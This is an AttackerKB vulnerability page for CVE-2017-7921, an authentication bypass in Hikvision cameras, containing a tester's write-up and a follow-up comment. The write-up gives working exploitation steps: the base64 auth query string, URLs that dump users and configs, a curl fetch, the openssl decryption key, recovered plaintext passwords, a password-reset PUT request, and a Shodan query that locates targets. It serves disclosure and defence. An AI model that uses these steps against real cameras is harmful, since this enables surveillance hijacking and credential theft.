Very High
CVE-2017-7921
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2017-7921
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Recently, I bumped into a bunch of Hikvision camera’s during a security engagement and surprise, surprise, they were all vulnerable against this old vulnerability CVE-2017-7921 discovered by Monte Crypto in September 2017. You can find his write up here: https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html.
It made me curious, because we are five years further in the game and it looks that the majority of the Hikvison camera’s and other white-labelled versions are still vulnerable.
I ran a quick scan with Shodan (search: “App-webs” “200 OK”) and it returns around 160.000 potential targets where, based on my quick assessment, probably 20% remains vulnerable !!!
This is of course bad or good news depending which side you are on ;–), but regardless if you are a good or bad actor, it does make sense to revisit this old timer once more again.
A small deep dive into the problem
Many Hikvision IP cameras contain a backdoor have improper authorization logic that allows unauthenticated impersonation of any configured user account.
The basics of this vulnerability is very simple.
Updated based on the comment of @gwillcox-r7
Our dear programmers from Hikvision left a piece of a code in the vulnerable firmware that has a hard coded magic string that bypasses all security on the camera and will provide full admin access. Our dear programmers from Hikvision developed proprietary HikCGI protocol, which exposes URI endpoints through the camera’s web interface. The HikCGI protocol handler checks for the presence of a parameter named auth
in the query string and if that parameter contains a base64-encoded username:password
string, the HikCGI API call assumes the identity of the specified user and the password is ignored.
Using user admin
bypasses all security on the camera and allows an attacker to completely control the camera and modify any setting or retrieve sensible information.
You use any combination of base64 encoded admin:password
string, such as the one below.
# echo "admin:11" | base64 YWRtaW46MTEK
All what is needed is to append this magic string ?auth=YWRtaW46MTEK
to GET and POST queries to access the camera with administrative privileges and do whatever you want.
Examples are:
Retrieve a list of all users and their roles: http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
or one can download the camera configuration: http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
And the use cases for exploitation are numerous, as described in the HIKCGI Integration Guide and IP Media Device Management Protocol User Guide from Hikvision.
Let me take two use cases to show how easy it is to retrieve users and passwords and change them.
First of all, if you want to retrieve the users and passwords, just first pull the configuration file from the vulnerable camera using the magic string.
curl http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK --output configurationFile
You should get a file named configurationFile
which holds all camera information including the user and password information in plain text.
However this file is encrypted (rather weak ;-0), so we need to decrypt it first.
There is a nice tool made by WormChickenWizard that will the job for us. Check it out, but for now I just apply the logic that he described in his README.md.
First decrypt the configurationFile
with following command:
openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
The AES encryption is now broken but the decryptedoutput
file is still xor encoded.
Use the tool from WormChickenWizard to decrypt the decrytedoutput
file to create a readable format that we can view with a hex editor to search for the users and passwords in plain text format.
java XORDecode
You should now have a file called plaintextOutput
file that you can inspect with a hex viewer or editor.
hexedit plaintextOutput
You will see output like this and the first admin and password you will find is the default admin password when your perform a factory reset (I love these Hikvision developers ;–)
00008358 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... 0000837C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... 000083A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... 000083C4 00 00 00 00 61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....admin........................... 000083E8 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12345............................... 0000840C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 .................................... 00008430 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... 00008454 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... 00008478 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .................................... --- plaintextOutput --0x801C/0xD8B30--4%---------------------------------------------------------------------------------------------------------------------
If you search a bit further, you will find the actual users and passwords. In this case two users (admin and admln)
000A7BD4 00 00 00 00 08 10 00 00 00 00 00 00 61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............admin................... 000A7BF8 00 00 00 00 00 00 00 00 50 61 24 24 57 30 72 64 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ........Pa$$W0rd.................... 000A7C1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 00 00 FF FF FF FF 00 00 00 00 .................................... 000A7C40 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 61 64 6D 6C 6E 00 00 00 00 00 00 00 ........................admln....... 000A7C64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 73 64 66 31 32 33 34 00 00 00 00 00 00 00 00 ....................asdf1234........ 000A7C88 00 70 0D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 .p.................................. 000A7CAC 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 .................................... --- plaintextOutput --0xA7850/0xD8B30--77%-------------------------------------------------------------------------------------------------------------------
Now if this is all too much effort, you can also decide to just reset the admin password with a new password.
The HTML code for that is pretty simple and can be easily executed using burp
Note: The new password should at least have 2 UPPERCASE, 2 lowercase and 2 special characters, otherwise it will not be accepted.
Burp request:
PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1 <?xml version="1.0" encoding="UTF-8"?> <User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"> <id>1</id> <userName>admin</userName> <password>Pa$$W0rd</password> </User>
To fix CVE-2017-7921, we recommend that users upgrade their Hikvision firmware to the latest version, but looking at the number of vulnerable camera’s out there, this will probably not help :–(.
References
I have added a reference to a Metasploit module that I developed and checks for a vulnerable camera and does the password reset for you.
I am currently updating the functionality of this module with some more actions to retrieve the config file, make a snapshot, enumerate the users and other stuff…
This module will be submitted shortly to the mainstream of Metasploit for acceptance of the Rapid7 development team.
Metasploit Hikvision module –> https://github.com/h00die-gr3y/Metasploit/
Update 24 September 2022:
Metasploit Hikvision module has been released to the mainstream –> https://github.com/rapid7/metasploit-framework/pull/17033
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- hikvision
Products
- ds-2cd2032-i firmware -,
- ds-2cd2112-i firmware -,
- ds-2cd2132-i firmware -,
- ds-2cd2212-i5 firmware -,
- ds-2cd2232-i5 firmware -,
- ds-2cd2312-i firmware -,
- ds-2cd2332-i firmware -,
- ds-2cd2412f-i(w) firmware -,
- ds-2cd2432f-i(w) firmware -,
- ds-2cd2512f-i(s) firmware -,
- ds-2cd2532f-i(s) firmware -,
- ds-2cd2612f-i(s) firmware -,
- ds-2cd2632f-i(s) firmware -,
- ds-2cd2712f-i(s) firmware -,
- ds-2cd2732f-i(s) firmware -,
- ds-2cd2t32-i3 firmware -,
- ds-2cd2t32-i5 firmware -,
- ds-2cd2t32-i8 firmware -,
- ds-2cd4012f-(a) firmware -,
- ds-2cd4012f-(p) firmware -,
- ds-2cd4012f-(w) firmware -,
- ds-2cd4012fwd-(a) firmware -,
- ds-2cd4012fwd-(p) firmware -,
- ds-2cd4012fwd-(w) firmware -,
- ds-2cd4024f-(a) firmware -,
- ds-2cd4024f-(p) firmware -,
- ds-2cd4024f-(w) firmware -,
- ds-2cd4032fwd-(a) firmware -,
- ds-2cd4032fwd-(p) firmware -,
- ds-2cd4032fwd-(w) firmware -,
- ds-2cd4112f-i(z) firmware -,
- ds-2cd4112fwd-i(z) firmware -,
- ds-2cd4124f-i(z) firmware -,
- ds-2cd4132fwd-i(z) firmware -,
- ds-2cd4212f-i(h) firmware -,
- ds-2cd4212f-i(s) firmware -,
- ds-2cd4212f-i(z) firmware -,
- ds-2cd4212fwd-i(h) firmware -,
- ds-2cd4212fwd-i(s) firmware -,
- ds-2cd4212fwd-i(z) firmware -,
- ds-2cd4224f-i(h) firmware -,
- ds-2cd4224f-i(s) firmware -,
- ds-2cd4224f-i(z) firmware -,
- ds-2cd4232fwd-i(h) firmware -,
- ds-2cd4232fwd-i(s) firmware -,
- ds-2cd4232fwd-i(z) firmware -,
- ds-2cd4312f-i(h) firmware -,
- ds-2cd4312f-i(s) firmware -,
- ds-2cd4312f-i(z) firmware -,
- ds-2cd4324f-i(h) firmware -,
- ds-2cd4324f-i(s) firmware -,
- ds-2cd4324f-i(z) firmware -,
- ds-2cd4332fwd-i(h) firmware -,
- ds-2cd4332fwd-i(s) firmware -,
- ds-2cd4332fwd-i(z) firmware -,
- ds-2cd63xx series firmware -,
- ds-2cd6412fwd firmware -,
- ds-2dfx series firmware -
Metasploit Modules
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Analysis above is technically correct however the real risk is a little higher as upon rereading the article at https://seclists.org/fulldisclosure/2017/Sep/23 which is the one that https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html copies off of, I saw this key important message:
Hikvision camera API includes support for proprietary HikCGI protocol, which exposes URI endpoints through the camera's web interface. The HikCGI protocol handler checks for the presence of a parameter named "auth" in the query string and if that parameter contains a base64-encoded "username:password" string, the HikCGI API call assumes the idntity of the specified user. The password is ignored
Note specifically that they state that the password is ignored. This is the true risk of this vulnerability. You can specify any user that is a valid user on the system and because the logic simply checks for the presence of an
auth
parameter in the URL to HikCGI pages that contains a base64 encoded string that matches the patternusername:password
, then ignores the password and uses the username for impersonation, you then become that user.The original PoCs used hardcoded Base64 string of
YWRtaW46MTEK
, which decodes toadmin:11
, as the username and password however so at first glance this seemed like a hardcoded credential issue, however this is not the case.admin
is the default user on the vast majority, but not all HikVision devices.The impact however is still the same as
admin
is the highest privileged user on these devices so you can do anything you want, including flashing the device with new firmware to backdoor the device, downloading the configuration file containing usernames and passwords (which are supposedly encrypted albeit with weak encryption that can be cracked due to the use of a weak password protecting the encryption key).Hope that helps!